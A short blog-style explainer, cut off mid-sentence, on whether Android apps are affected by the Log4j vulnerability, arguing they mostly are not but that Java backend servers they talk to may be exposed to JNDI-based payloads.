Skip to content

Whether Android apps are affected by the Log4j vulnerability?

Android apps also use Java but whether they are affected by this new vulnerability? This all depends upon which Android apps are using and which Android versions you are using. Straight answer is Android apps might not get affected by this vulnerability as Android uses it own logging library and doesn’t use JNDI call (see below). And added to that each app is isolated from other apps.

But if the backend servers which are being used by these Android apps are written in Java, then there is a real good chance for an attacker to send some malicious payload to the server via any mobile app and run their own commands on the server

JNDI call:
As you all know Log4j vulnerability was caused by a bug in the popular Log4j library that allowed a JNDI call in a malicious payload to directly call an external domain name without getting filtered. Since this is being used in lot of Java applications which runs on servers, almost all of them needs to patch. But